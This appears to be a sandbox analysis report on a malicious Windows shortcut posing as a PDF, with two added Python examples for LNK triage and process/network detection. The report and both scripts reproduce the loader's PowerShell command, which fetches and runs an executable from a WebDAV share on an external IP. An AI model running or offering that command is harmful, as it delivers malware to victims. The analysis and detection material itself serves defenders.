                                                                                                SSDEEP:3:Nllluldhz/lL:NllU
                                                                                                MD5:03744CE5681CB7F5E53A02F19FA22067
                                                                                                SHA1:234FB09010F6714453C83795D8CF3250D871D4DF
                                                                                                SHA-256:88348573B57BA21639837E3AF19A00B4D7889E2D8E90A923151AC022D2946E5D
                                                                                                SHA-512:0C05D6047DBA2286F8F72EB69A69919DC5650F96E8EE759BA9B3FC10BE793F3A88408457E700936BCACA02816CE25DD53F48B962491E7F4F0A4A534D88A855E6
                                                                                                Malicious:false
Preview: (binary data, omitted)
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4694
                                                                                                Entropy (8bit):3.8496969563224326
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:uNT1MN3QcQtqt85I/i+5UbBKFnQlRtSogZoMe5UbBKFnQl4tSogZoo1:eq5bQxC/lubcFQQHwubcFQPHL
                                                                                                MD5:8A872822D3F0F48E054D544B38D8A4BC
                                                                                                SHA1:0A494387F6F39DB68737D385813E9B35C37AD8CE
                                                                                                SHA-256:421F49B635FFFDF37A80A3332110C2940BAE25BEE0FDD539E1056C24CB8A5E10
                                                                                                SHA-512:4D237964A2F0C6C585529D440982B16CAC34C0F585D18E63B25A9D6EAC48DBBABDA420D9D4D91B1A4E63D370E73A44226CA5DF1CC23589A0808500AE7F22167E
                                                                                                Malicious:false
Preview: (binary data, omitted)
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4694
                                                                                                Entropy (8bit):3.8496969563224326
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:uNT1MN3QcQtqt85I/i+5UbBKFnQlRtSogZoMe5UbBKFnQl4tSogZoo1:eq5bQxC/lubcFQQHwubcFQPHL
                                                                                                MD5:8A872822D3F0F48E054D544B38D8A4BC
                                                                                                SHA1:0A494387F6F39DB68737D385813E9B35C37AD8CE
                                                                                                SHA-256:421F49B635FFFDF37A80A3332110C2940BAE25BEE0FDD539E1056C24CB8A5E10
                                                                                                SHA-512:4D237964A2F0C6C585529D440982B16CAC34C0F585D18E63B25A9D6EAC48DBBABDA420D9D4D91B1A4E63D370E73A44226CA5DF1CC23589A0808500AE7F22167E
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F. .. .....|..........;...q3..;..y............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......-/.v.................;......2.y...uY]N .#U0414~1.LNK.........DWP`uY]N..........................P{4.#.U.0.4.1.4.#.U.0.4.3.e.#.U.0.4.3.a.#.U.0.4.4.3.#.U.0.4.3.c.#.U.0.4.3.5.#.U.0.4.3.d.#.U.0.4.4.2.#.U.0.4.3.8...p.d.f...l.n.k.......................-.....................R......C:\Users\user\Desktop\#U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnk.. .\.\.7.7...1.0.5...1.6.1...1.9.4.@.8.0.\.f.i.l.e.\.P.D.F...i.c.o.`.......X.......580913...........hT..CrF.f4... ..}T..b...,.......hT..CrF.f4... ..}T..b...,..............Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z.............."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....D
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):55
                                                                                                Entropy (8bit):4.306461250274409
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                Malicious:false
                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Aug 29 13:52:48 2024, mtime=Wed Oct 9 19:25:36 2024, atime=Thu Aug 29 13:52:48 2024, length=455680, window=hide
                                                                                                Entropy (8bit):4.5612203514260194
                                                                                                TrID:
                                                                                                • Windows Shortcut (20020/1) 100.00%
                                                                                                File name:#U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnk
                                                                                                File size:1'401 bytes
                                                                                                MD5:cffb40e13e3aa6761330090b42314c36
                                                                                                SHA1:eb73790a82578588c0080175f8ac215025e57389
                                                                                                SHA256:330d36e248881a0a24a7d0612f3ac9a5a24cc960b36c2fe9ba0d63941b12fc18
                                                                                                SHA512:a5afb280e5cb16044e6ee77e3e4c696e45e065520e09d62fbc62d2b6e9938fa738a728bf7fe8815ca35a5fbe5b180574bda33ba380b8b5e6402f14aff7dd9913
                                                                                                SSDEEP:24:8voYk2CdGcRkKvgWQAoPWWsAM/6MUoIakWbG7A9Bf6WTFab/U3IVqm:8OtMcN1nohMLBIaTwA9rabU3Kq
                                                                                                TLSH:4E21FE201EF1037ACAF3C6B8A4F7633F9EBAB415E6114F4D115046065862321ECB9F2E
                                                                                                File Content Preview:L..................F.... ...O.;.#...p.Xf.....e=.#................................P.O. .:i.....+00.../C:\...................V.1.....HYK...Windows.@........OwHIYx.....6.......................I.W.i.n.d.o.w.s.....Z.1.....HY....System32..B........OwHIY........
                                                                                                Icon Hash:69e9a9a9a3a3a1a5

                                                                                                General

                                                                                                Relative Path:
                                                                                                Command Line Argument:-c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\6706e721f2c06.exe
                                                                                                Icon location:\\77.105.161.194@80\file\PDF.ico
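The `@80` in `\\77.105.161.194@80\file\` is what turns this UNC path into a WebDAV mount: Windows hands `\\host@port\share` (and `\\host@SSL\share`) to the WebClient service, which fetches `http://77.105.161.194:80/file/` over plain HTTP, so the loader needs no SMB egress, and the shortcut's `PDF.ico` icon is served from the same host. The script below is an added example written for this page, not part of the Joe Sandbox report or its tooling: it decodes the ShellLinkHeader and StringData straight from MS-SHLLINK, rewrites every WebDAV-style UNC into the URL the WebClient will request, and flags the double extension and the `Stop-Process -Name explorer` step. The sample shortcut is constructed in `build_lnk()` from the command line and icon path shown above; the `RunAsUser` flag is set on that constructed sample only to exercise the check, since the report does not say whether the real file sets it.

```python
"""Static triage of a Windows shortcut (MS-SHLLINK) for the WebDAV-over-UNC launch
pattern shown in the report. Added example, not Joe Sandbox code; the sample .lnk
is constructed in build_lnk() to carry the report's command line and icon path."""
import json
import re
import struct

# LinkFlags bits, MS-SHLLINK 2.1.1
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x1, 0x2, 0x4, 0x8
HAS_WORKING_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
RUN_AS_USER = 0x2000                       # shortcut requests elevation
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
SHOW_CMD = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}

# \\host@port\..., \\host@SSL\... or \\host@SSL@port\...: Windows hands these to the
# WebClient service (WebDAV mini-redirector) instead of SMB.
WEBDAV_UNC = re.compile(
    r"\\\\([A-Za-z0-9.\-]+)@(?:(SSL)(?:@(\d+))?|(\d+))\\([^\s'\";]*)", re.I)
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.lnk$", re.I)
KILLS_EXPLORER = re.compile(r"stop-process\s+-name\s+explorer", re.I)


def parse_lnk(data: bytes) -> dict:
    """Decode the ShellLinkHeader and StringData; IDList and LinkInfo are skipped by size."""
    if len(data) < 76 or data[:4] != b"L\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a ShellLink file")
    flags = struct.unpack_from("<I", data, 20)[0]
    icon_index, show_cmd = struct.unpack_from("<II", data, 56)
    pos = 76
    if flags & HAS_ID_LIST:                # IDListSize (2 bytes) + items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:              # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    strings = {}
    for bit, key in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                     (HAS_WORKING_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                     (HAS_ICON, "icon_location")):
        if flags & bit:                    # CountCharacters (2 bytes) + chars, no terminator
            count = struct.unpack_from("<H", data, pos)[0]
            raw = data[pos + 2: pos + 2 + count * width]
            pos += 2 + count * width
            strings[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")
    return {"run_as_user": bool(flags & RUN_AS_USER), "icon_index": icon_index,
            "show_command": SHOW_CMD.get(show_cmd, str(show_cmd)), **strings}


def webdav_urls(text: str) -> list:
    """Translate every WebDAV-style UNC in text to the URL the WebClient will request."""
    urls = []
    for host, ssl, ssl_port, port, path in WEBDAV_UNC.findall(text):
        scheme = "https" if ssl else "http"
        port = ssl_port or port or ("443" if ssl else "80")
        urls.append(f"{scheme}://{host}:{port}/" + path.replace("\\", "/"))
    return urls


def triage(filename: str, data: bytes) -> dict:
    """Parse the shortcut and return findings plus the URLs worth blocking or hunting."""
    info = parse_lnk(data)
    args, icon = info.get("arguments", ""), info.get("icon_location", "")
    urls = sorted(set(webdav_urls(args) + webdav_urls(icon)))
    findings = []
    if DOUBLE_EXT.search(filename):
        findings.append("double extension: document name hides .lnk")
    if urls:
        findings.append("WebDAV UNC in arguments or icon: content fetched over HTTP by WebClient")
    if KILLS_EXPLORER.search(args):
        findings.append("kills explorer.exe after opening the share")
    if info["run_as_user"]:
        findings.append("RunAsUser flag: will prompt for elevation")
    return {"findings": findings, "urls": urls, **info}


def build_lnk(arguments: str, icon: str, extra_flags: int = 0) -> bytes:
    """Constructed sample: a minimal Unicode .lnk with only arguments and icon location."""
    flags = HAS_ARGS | HAS_ICON | IS_UNICODE | extra_flags
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 455680, 0, 1, 0, 0, 0, 0)

    def enc(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + enc(arguments) + enc(icon)


# Report values reproduced as constructed input (RunAsUser is added only to exercise the check).
SAMPLE_NAME = "#U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnk"
SAMPLE_ARGS = ("-c \"explorer '\\\\77.105.161.194@80\\file\\'\"; Start-Sleep -Seconds 1; "
               "Stop-Process -Name explorer; \\\\77.105.161.194@80\\file\\6706e721f2c06.exe")
SAMPLE_ICON = "\\\\77.105.161.194@80\\file\\PDF.ico"

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_NAME, build_lnk(SAMPLE_ARGS, SAMPLE_ICON, RUN_AS_USER)), indent=2))
```

Running the script prints the findings and the three URLs (`/file/`, `/file/6706e721f2c06.exe`, `/file/PDF.ico`), which are the right granularity for a proxy block or a retro-hunt. The parser skips the LinkTargetIDList and LinkInfo blocks by their size fields, so it works on real shortcuts that carry them, but it does not read the ExtraData blocks that follow StringData (for example the PropertyStore), so anything stored there is not reported.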
TCP Packets

Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Nov 21, 2024 10:51:01.464806080 CET  49730        80         192.168.2.4     77.105.161.194
Nov 21, 2024 10:51:01.584726095 CET  80           49730      77.105.161.194  192.168.2.4
Nov 21, 2024 10:51:01.584841013 CET  49730        80         192.168.2.4     77.105.161.194
Nov 21, 2024 10:51:01.585267067 CET  49730        80         192.168.2.4     77.105.161.194
Nov 21, 2024 10:51:01.705009937 CET  80           49730      77.105.161.194  192.168.2.4
Nov 21, 2024 10:51:03.327699900 CET  49730        80         192.168.2.4     77.105.161.194

UDP Packets

Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Nov 21, 2024 10:51:06.122558117 CET  57277        53         192.168.2.4  1.1.1.1

DNS Queries

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name         Type            Class        DNS over HTTPS
Nov 21, 2024 10:51:06.122558117 CET  192.168.2.4  1.1.1.1  0xcafe    Standard query (0)  api.msn.com  A (IP address)  IN (0x0001)  false

DNS Answers

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name         CName                            Address  Type                    Class        DNS over HTTPS
Nov 21, 2024 10:51:06.349109888 CET  1.1.1.1    192.168.2.4  0xcafe    No error (0)  api.msn.com  api-msn-com.a-0003.a-msedge.net  -        CNAME (Canonical name)  IN (0x0001)  false

HTTP Packets

Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49730        77.105.161.194  80                5544  C:\Windows\explorer.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 21, 2024 10:51:01.585267067 CET  103                OUT        OPTIONS / HTTP/1.1
                                                                   Connection: Keep-Alive
                                                                   User-Agent: DavClnt
                                                                   translate: f
                                                                   Host: 77.105.161.194



                                                                                                Target ID:0
                                                                                                Start time:04:50:58
                                                                                                Start date:21/11/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\6706e721f2c06.exe
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:1
                                                                                                Start time:04:50:58
                                                                                                Start date:21/11/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:04:51:00
                                                                                                Start date:21/11/2024
                                                                                                Path:C:\Windows\explorer.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\explorer.exe" \\77.105.161.194@80\file\
                                                                                                Imagebase:0x7ff72b770000
                                                                                                File size:5'141'208 bytes
                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:04:51:02
                                                                                                Start date:21/11/2024
                                                                                                Path:C:\Windows\explorer.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:explorer.exe
                                                                                                Imagebase:0x7ff72b770000
                                                                                                File size:5'141'208 bytes
                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:4
                                                                                                Start time:04:51:03
                                                                                                Start date:21/11/2024
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                Imagebase:0x7ff6eef20000
                                                                                                File size:55'320 bytes
                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true
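Read together, the process tree and the network section give the loader's runtime signature: powershell.exe spawns explorer.exe with the `\\77.105.161.194@80\file\` argument, stops it a second later, and runs `6706e721f2c06.exe` from the same share, while the only HTTP traffic is an `OPTIONS /` probe with User-Agent `DavClnt`, which is the Windows WebClient mini-redirector announcing itself to the server, attributed here to PID 5544. The rules below are an added example written for this page, not Joe Sandbox detection logic. The process and HTTP records are constructed to mirror Target IDs 0 to 3 and the HTTP packet above; the respawned explorer's PID (6001) and the PowerShell parent PID (0) are placeholders, because the report does not show them.

```python
"""Detection logic for the chain recorded in the report: powershell.exe opens a
WebDAV UNC in explorer.exe, kills explorer, runs an .exe from the share, and the
WebClient sends OPTIONS with User-Agent DavClnt to the external host. Added
example; the records below are constructed to mirror the report, not real telemetry."""
import ipaddress
import re

WEBDAV_UNC = re.compile(r"\\\\[A-Za-z0-9.\-]+@(?:SSL|\d+)", re.I)
KILLS_EXPLORER = re.compile(r"stop-process\s+-name\s+explorer|taskkill\b.*explorer\.exe", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Constructed process-creation records (Sysmon EID 1 / 4688 fields) after Target IDs 0-3.
# ppid 0 and pid 6001 are placeholders: the report does not show those values.
PROCESSES = [
    {"pid": 2640, "ppid": 0, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\6706e721f2c06.exe'''},
    {"pid": 5820, "ppid": 2640, "image": r"C:\Windows\System32\conhost.exe",
     "cmd": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 5544, "ppid": 2640, "image": r"C:\Windows\explorer.exe",
     "cmd": '"C:\\Windows\\explorer.exe" \\\\77.105.161.194@80\\file\\'},
    {"pid": 6001, "ppid": 0, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
]
# Constructed HTTP record for the OPTIONS probe the report attributes to PID 5544.
HTTP = [{"pid": 5544, "dst": "77.105.161.194", "dport": 80, "method": "OPTIONS",
         "path": "/", "user_agent": "DavClnt"}]


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(processes: list, http: list) -> list:
    """Return (severity, rule, pid) tuples for the WebDAV-UNC launch pattern."""
    by_pid = {p["pid"]: p for p in processes}
    alerts = []
    for p in processes:
        name = image_name(p["image"])
        if WEBDAV_UNC.search(p["cmd"]):
            # Any process given a host@port UNC pulls content through WebClient over HTTP;
            # a script host doing it is the loader pattern, a bare Explorer hit may be a user.
            sev = "high" if name in SCRIPT_HOSTS else "medium"
            alerts.append((sev, "webdav_unc_in_cmdline", p["pid"]))
        parent = by_pid.get(p["ppid"])
        if (name == "explorer.exe" and parent and image_name(parent["image"]) in SCRIPT_HOSTS
                and WEBDAV_UNC.search(p["cmd"]) and KILLS_EXPLORER.search(parent["cmd"])):
            # Script host opens a WebDAV folder in Explorer and kills Explorer afterwards:
            # the share is mounted and the window hidden, the user sees at most a flicker.
            alerts.append(("high", "explorer_opened_on_webdav_then_killed", parent["pid"]))
    for h in http:
        # DavClnt is the WebClient mini-redirector's OPTIONS probe; to a public address it
        # means the host is mounting someone's WebDAV server, which is rare on a workstation.
        if (h["method"] == "OPTIONS" and h["user_agent"].startswith("DavClnt")
                and ipaddress.ip_address(h["dst"]).is_global):
            alerts.append(("medium", "webclient_probe_to_public_host", h["pid"]))
    return alerts


if __name__ == "__main__":
    for sev, rule, pid in detect(PROCESSES, HTTP):
        print(f"{sev:6} {rule:40} pid={pid}")
```

In production the process fields map directly onto Sysmon event 1 (ParentProcessId, Image, CommandLine) or Security event 4688, and the HTTP fields onto proxy or EDR network telemetry. The `is_global` filter on the DavClnt rule deliberately ignores internal WebDAV servers such as SharePoint, which is where legitimate WebClient traffic normally goes; drop it if the environment has no such servers and any WebDAV probe is worth a look.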

                                                                                                No disassembly